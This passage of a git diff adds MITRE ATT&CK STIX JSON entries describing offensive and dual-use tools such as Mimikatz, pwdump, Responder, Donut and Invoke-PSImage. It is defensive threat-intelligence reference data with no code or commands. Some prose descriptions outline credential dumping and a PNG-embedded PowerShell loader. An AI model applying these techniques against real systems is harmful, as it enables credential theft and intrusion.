"bundle--ba57f615-d36b-421d-806c-f521fb362461", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--96fd6cc4-a693-4118-83ec-619e5352d07d", + "type": "tool", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0191", + "external_id": "S0191" + }, + { + "source_name": "Winexe", + "description": "(Citation: Winexe Github Sept 2013) (Citation: \u00dcberwachung APT28 Forfiles June 2015)" + }, + { + "source_name": "Winexe Github Sept 2013", + "description": "Skalkotos, N. (2013, September 20). WinExe. Retrieved January 22, 2018.", + "url": "https://github.com/skalkoto/winexe/" + }, + { + "source_name": "\u00dcberwachung APT28 Forfiles June 2015", + "description": "Guarnieri, C. (2015, June 19). Digital Attack on German Parliament: Investigative Report on the Hack of the Left Party Infrastructure in Bundestag. Retrieved January 22, 2018.", + "url": "https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "Winexe", + "description": "[Winexe](https://attack.mitre.org/software/S0191) is a lightweight, open source tool similar to [PsExec](https://attack.mitre.org/software/S0029) designed to allow system administrators to execute commands on remote servers. (Citation: Winexe Github Sept 2013) [Winexe](https://attack.mitre.org/software/S0191) is unique in that it is a GNU/Linux based client. (Citation: \u00dcberwachung APT28 Forfiles June 2015)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--975737f1-b10d-476f-8bda-3ec26ea57172.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--975737f1-b10d-476f-8bda-3ec26ea57172.json new file mode 100644 index 0000000000000000000000000000000000000000..a4ad3267138089b92d2e37ae75cde9586eb50232 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--975737f1-b10d-476f-8bda-3ec26ea57172.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--8a83a8cd-b5fb-4123-9ffd-b99a5e5783c9", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "MCMD" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "tool", + "id": "tool--975737f1-b10d-476f-8bda-3ec26ea57172", + "created": "2020-08-13T17:15:25.702Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0500", + "url": "https://attack.mitre.org/software/S0500" + }, + { + "source_name": "Secureworks MCMD July 2019", + "url": "https://www.secureworks.com/research/mcmd-malware-analysis", + "description": "Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[MCMD](https://attack.mitre.org/software/S0500) is a remote access tool that provides remote command shell capability used by [Dragonfly 2.0](https://attack.mitre.org/groups/G0074).(Citation: Secureworks MCMD July 2019)", + "modified": "2022-07-29T19:48:28.725Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "MCMD", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--981acc4c-2ede-4b56-be6e-fa1a75f37acf.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--981acc4c-2ede-4b56-be6e-fa1a75f37acf.json new file mode 100644 index 0000000000000000000000000000000000000000..3c51d40ca0d4b31becb774f0776e1fb8f56e3285 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--981acc4c-2ede-4b56-be6e-fa1a75f37acf.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--fc29e52a-25b0-4cdf-8994-269646afd4bb", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Nltest" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--981acc4c-2ede-4b56-be6e-fa1a75f37acf", + "type": "tool", + "created": "2019-02-14T17:08:55.176Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0359", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0359" + }, + { + "source_name": "Nltest Manual", + "url": "https://ss64.com/nt/nltest.html", + "description": "ss64. (n.d.). NLTEST.exe - Network Location Test. Retrieved February 14, 2019." + } + ], + "modified": "2021-10-07T16:41:18.760Z", + "name": "Nltest", + "description": "[Nltest](https://attack.mitre.org/software/S0359) is a Windows command-line utility used to list domain controllers and enumerate domain trusts.(Citation: Nltest Manual)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--999c4e6e-b8dc-4b4f-8d6e-1b829f29997e.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--999c4e6e-b8dc-4b4f-8d6e-1b829f29997e.json new file mode 100644 index 0000000000000000000000000000000000000000..f7f65056337f3579fc69b74ae0ac52e6ce1e7031 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--999c4e6e-b8dc-4b4f-8d6e-1b829f29997e.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--99f961b0-910b-4ec6-90d1-426ff318226d", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Office 365", + "Windows", + "Azure AD" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "MailSniper" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--999c4e6e-b8dc-4b4f-8d6e-1b829f29997e", + "type": "tool", + "created": "2019-10-05T02:34:01.189Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0413", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0413" + }, + { + "source_name": "GitHub MailSniper", + "url": "https://github.com/dafthack/MailSniper", + "description": "Bullock, B., . (2018, November 20). MailSniper. Retrieved October 4, 2019." + } + ], + "modified": "2020-03-30T17:01:41.302Z", + "name": "MailSniper", + "description": "MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used by a non-administrative user to search their own email, or by an Exchange administrator to search the mailboxes of every user in a domain.(Citation: GitHub MailSniper)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--9a2640c2-9f43-46fe-b13f-bde881e55555.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--9a2640c2-9f43-46fe-b13f-bde881e55555.json new file mode 100644 index 0000000000000000000000000000000000000000..ad8feda05e5cf33ffeced2d9104e32b54d7d4665 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--9a2640c2-9f43-46fe-b13f-bde881e55555.json @@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--54697275-6ca3-4e44-ab77-c037e843cd11", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--9a2640c2-9f43-46fe-b13f-bde881e55555", + "type": "tool", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0225", + "external_id": "S0225" + }, + { + "source_name": "sqlmap Introduction", + "description": "Damele, B., Stampar, M. (n.d.). sqlmap. Retrieved March 19, 2018.", + "url": "http://sqlmap.org/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "sqlmap", + "description": "[sqlmap](https://attack.mitre.org/software/S0225) is an open source penetration testing tool that can be used to automate the process of detecting and exploiting SQL injection flaws. (Citation: sqlmap Introduction)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--9de2308e-7bed-43a3-8e58-f194b3586700.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--9de2308e-7bed-43a3-8e58-f194b3586700.json new file mode 100644 index 0000000000000000000000000000000000000000..3c76d4082edc955108e9cc7b61df104de15281bd --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--9de2308e-7bed-43a3-8e58-f194b3586700.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--29a76097-d67c-4313-9700-a5fdd2945a0c", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "pwdump" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--9de2308e-7bed-43a3-8e58-f194b3586700", + "type": "tool", + "created": "2017-05-31T21:32:13.051Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0006", + "external_id": "S0006" + }, + { + "source_name": "Wikipedia pwdump", + "description": "Wikipedia. (2007, August 9). pwdump. Retrieved June 22, 2016.", + "url": "https://en.wikipedia.org/wiki/Pwdump" + } + ], + "modified": "2020-08-13T20:12:50.895Z", + "name": "pwdump", + "description": "[pwdump](https://attack.mitre.org/software/S0006) is a credential dumper. (Citation: Wikipedia pwdump)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--a1dd2dbd-1550-44bf-abcc-1a4c52e97719.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--a1dd2dbd-1550-44bf-abcc-1a4c52e97719.json new file mode 100644 index 0000000000000000000000000000000000000000..8235994d4edee72f89e485c0513749d9c16ce248 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--a1dd2dbd-1550-44bf-abcc-1a4c52e97719.json @@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--a0fcfe02-d87a-4a18-8d9a-33c8db995e51", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-17T14:01:57.617Z", + "name": "Responder", + "description": "Responder is an open source tool used for LLMNR, NBT-NS and MDNS poisoning, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. (Citation: GitHub Responder)", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_aliases": [ + "Responder" + ], + "type": "tool", + "id": "tool--a1dd2dbd-1550-44bf-abcc-1a4c52e97719", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0174", + "external_id": "S0174" + }, + { + "source_name": "GitHub Responder", + "description": "Gaffie, L. (2016, August 25). Responder. Retrieved November 17, 2017.", + "url": "https://github.com/SpiderLabs/Responder" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--a52edc76-328d-4596-85e7-d56ef5a9eb69.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--a52edc76-328d-4596-85e7-d56ef5a9eb69.json new file mode 100644 index 0000000000000000000000000000000000000000..f73a72de140b36dc59973a91cf323449107402af --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--a52edc76-328d-4596-85e7-d56ef5a9eb69.json @@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--c206c568-ba9f-4dab-8747-c45de19b6a30", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--a52edc76-328d-4596-85e7-d56ef5a9eb69", + "type": "tool", + "created": "2017-05-31T21:33:11.426Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0122", + "external_id": "S0122" + }, + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "Pass-The-Hash Toolkit", + "description": "[Pass-The-Hash Toolkit](https://attack.mitre.org/software/S0122) is a toolkit that allows an adversary to \"pass\" a password hash (without knowing the original password) to log in to systems. (Citation: Mandiant APT1)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--a7b5df47-73bb-4d47-b701-869f185633a6.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--a7b5df47-73bb-4d47-b701-869f185633a6.json new file mode 100644 index 0000000000000000000000000000000000000000..90d5b3ce2c635a5d9de513af3c93383abff4a4db --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--a7b5df47-73bb-4d47-b701-869f185633a6.json @@ -0,0 +1,61 @@ +{ + "type": "bundle", + "id": "bundle--58936f97-12ab-4a24-a3e0-aaaa7766aa00", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "The Wover, @TheRealWover" + ], + "x_mitre_aliases": [ + "Donut" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "tool", + "id": "tool--a7b5df47-73bb-4d47-b701-869f185633a6", + "created": "2022-03-25T13:35:46.781Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0695", + "url": "https://attack.mitre.org/software/S0695" + }, + { + "source_name": "NCC Group WastedLocker June 2020", + "url": "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", + "description": "Antenucci, S., Pantazopoulos, N., Sandee, M. (2020, June 23). WastedLocker: A New Ransomware Variant Developed By The Evil Corp Group. Retrieved September 14, 2021." + }, + { + "source_name": "Introducing Donut", + "url": "https://thewover.github.io/Introducing-Donut/", + "description": "The Wover. (2019, May 9). Donut - Injecting .NET Assemblies as Shellcode. Retrieved October 4, 2021." + }, + { + "source_name": "Donut Github", + "url": "https://github.com/TheWover/donut", + "description": "TheWover. (2019, May 9). donut. Retrieved March 25, 2022." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Donut](https://attack.mitre.org/software/S0695) is an open source framework used to generate position-independent shellcode.(Citation: Donut Github)(Citation: Introducing Donut) [Donut](https://attack.mitre.org/software/S0695) generated code has been used by multiple threat actors to inject and load malicious payloads into memory.(Citation: NCC Group WastedLocker June 2020)", + "modified": "2022-04-18T15:31:34.662Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Donut", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--afc079f3-c0ea-4096-b75d-3f05338b7f60.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--afc079f3-c0ea-4096-b75d-3f05338b7f60.json new file mode 100644 index 0000000000000000000000000000000000000000..0fefb0e961d030def7dec071b3a3c327e84f02fb --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--afc079f3-c0ea-4096-b75d-3f05338b7f60.json @@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--cfe12df3-c332-4b3f-aa2b-b52772191c1c", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-07T13:04:10.731Z", + "name": "Mimikatz", + "description": "[Mimikatz](https://attack.mitre.org/software/S0002) is a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks. (Citation: Deply Mimikatz) (Citation: Adsecurity Mimikatz Guide)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.7", + "x_mitre_contributors": [ + "Vincent Le Toux" + ], + "x_mitre_aliases": [ + "Mimikatz" + ], + "type": "tool", + "id": "tool--afc079f3-c0ea-4096-b75d-3f05338b7f60", + "created": "2017-05-31T21:32:11.544Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0002", + "external_id": "S0002" + }, + { + "source_name": "Deply Mimikatz", + "description": "Deply, B. (n.d.). Mimikatz. Retrieved September 29, 2015.", + "url": "https://github.com/gentilkiwi/mimikatz" + }, + { + "source_name": "Adsecurity Mimikatz Guide", + "description": "Metcalf, S. (2015, November 13). Unofficial Guide to Mimikatz & Command Reference. Retrieved December 23, 2015.", + "url": "https://adsecurity.org/?page_id=1821" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b07c2c47-fefb-4d7c-a69e-6a3296171f54.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b07c2c47-fefb-4d7c-a69e-6a3296171f54.json new file mode 100644 index 0000000000000000000000000000000000000000..a2ebe970e068b23e6e4473f4a71eb65ff5e7780e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b07c2c47-fefb-4d7c-a69e-6a3296171f54.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--ab38de8d-f0e9-43d3-891d-246a9b7a3f45", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-22T20:55:32.937Z", + "name": "gsecdump", + "description": "[gsecdump](https://attack.mitre.org/software/S0008) is a publicly-available credential dumper used to obtain password hashes and LSA secrets from Windows operating systems. (Citation: TrueSec Gsecdump)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_aliases": [ + "gsecdump" + ], + "type": "tool", + "id": "tool--b07c2c47-fefb-4d7c-a69e-6a3296171f54", + "created": "2017-05-31T21:32:13.755Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0008", + "external_id": "S0008" + }, + { + "source_name": "TrueSec Gsecdump", + "description": "TrueSec. (n.d.). gsecdump v2.0b5. Retrieved September 29, 2015.", + "url": "https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b1595ddd-a783-482a-90e1-8afc8d48467e.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b1595ddd-a783-482a-90e1-8afc8d48467e.json new file mode 100644 index 0000000000000000000000000000000000000000..295b4c1632240def7a3cdc8099a8bb29f7590d98 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b1595ddd-a783-482a-90e1-8afc8d48467e.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--30abcd96-04d2-4133-afdc-8f1076df368b", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "IronNetInjector" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "tool", + "id": "tool--b1595ddd-a783-482a-90e1-8afc8d48467e", + "created": "2021-02-24T21:28:44.175Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0581", + "url": "https://attack.mitre.org/software/S0581" + }, + { + "source_name": "Unit 42 IronNetInjector February 2021 ", + "url": "https://unit42.paloaltonetworks.com/ironnetinjector/", + "description": "Reichel, D. (2021, February 19). IronNetInjector: Turla\u2019s New Malware Loading Tool. Retrieved February 24, 2021." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[IronNetInjector](https://attack.mitre.org/software/S0581) is a [Turla](https://attack.mitre.org/groups/G0010) toolchain that utilizes scripts from the open-source IronPython implementation of Python with a .NET injector to drop one or more payloads including [ComRAT](https://attack.mitre.org/software/S0126).(Citation: Unit 42 IronNetInjector February 2021 )", + "modified": "2022-05-20T17:02:59.587Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "IronNetInjector", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b35068ec-107a-4266-bda8-eb7036267aea.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b35068ec-107a-4266-bda8-eb7036267aea.json new file mode 100644 index 0000000000000000000000000000000000000000..0bedf3f22c336e0114073950fe500ca35236d060 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b35068ec-107a-4266-bda8-eb7036267aea.json @@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--e1e81b54-5218-4499-9cc3-9e997d717d48", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--b35068ec-107a-4266-bda8-eb7036267aea", + "type": "tool", + "created": "2017-05-31T21:33:03.773Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0102", + "external_id": "S0102" + }, + { + "source_name": "TechNet Nbtstat", + "description": "Microsoft. (n.d.). Nbtstat. Retrieved April 17, 2016.", + "url": "https://technet.microsoft.com/en-us/library/cc940106.aspx" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "nbtstat", + "description": "[nbtstat](https://attack.mitre.org/software/S0102) is a utility used to troubleshoot NetBIOS name resolution. (Citation: TechNet Nbtstat)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b52d6583-14a2-4ddc-8527-87fd2142558f.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b52d6583-14a2-4ddc-8527-87fd2142558f.json new file mode 100644 index 0000000000000000000000000000000000000000..b6d6ea66134e19b66070816ed6674f991977c36f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b52d6583-14a2-4ddc-8527-87fd2142558f.json @@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--b9781d1d-e8ba-4f54-9c9e-51dd5f66b78b", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-18T22:02:48.228Z", + "name": "Invoke-PSImage", + "description": "[Invoke-PSImage](https://attack.mitre.org/software/S0231) takes a PowerShell script and embeds the bytes of the script into the pixels of a PNG image. It generates a one liner for executing either from a file of from the web. Example of usage is embedding the PowerShell code from the Invoke-Mimikatz module and embed it into an image file. By calling the image file from a macro for example, the macro will download the picture and execute the PowerShell code, which in this case will dump the passwords. (Citation: GitHub Invoke-PSImage)", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_aliases": [ + "Invoke-PSImage" + ], + "type": "tool", + "id": "tool--b52d6583-14a2-4ddc-8527-87fd2142558f", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0231", + "external_id": "S0231" + }, + { + "source_name": "GitHub Invoke-PSImage", + "description": "Adams, B. (2017, December 17). Invoke-PSImage. Retrieved April 10, 2018.", + "url": "https://github.com/peewpw/Invoke-PSImage" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b63970b7-ddfb-4aee-97b1-80d335e033a8.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b63970b7-ddfb-4aee-97b1-80d335e033a8.json new file mode 100644 index 0000000000000000000000000000000000000000..aad8dbf077f474ccd673faa67e861f3b77fbe5ac --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b63970b7-ddfb-4aee-97b1-80d335e033a8.json @@ -0,0 +1,66 @@ +{ + "type": "bundle", + "id": "bundle--aa82853c-1aff-4e12-a510-efc26bb052bf", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Daniyal Naeem, BT Security" + ], + "x_mitre_aliases": [ + "NBTscan" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--b63970b7-ddfb-4aee-97b1-80d335e033a8", + "type": "tool", + "created": "2021-03-17T15:26:20.015Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0590", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0590" + }, + { + "source_name": "Debian nbtscan Nov 2019", + "url": "https://manpages.debian.org/testing/nbtscan/nbtscan.1.en.html", + "description": "Bezroutchko, A. (2019, November 19). NBTscan man page. Retrieved March 17, 2021." + }, + { + "source_name": "SecTools nbtscan June 2003", + "url": "https://sectools.org/tool/nbtscan/", + "description": "SecTools. (2003, June 11). NBTscan. Retrieved March 17, 2021." + }, + { + "source_name": "Symantec Waterbug Jun 2019", + "url": "https://www.symantec.com/blogs/threat-intelligence/waterbug-espionage-governments", + "description": 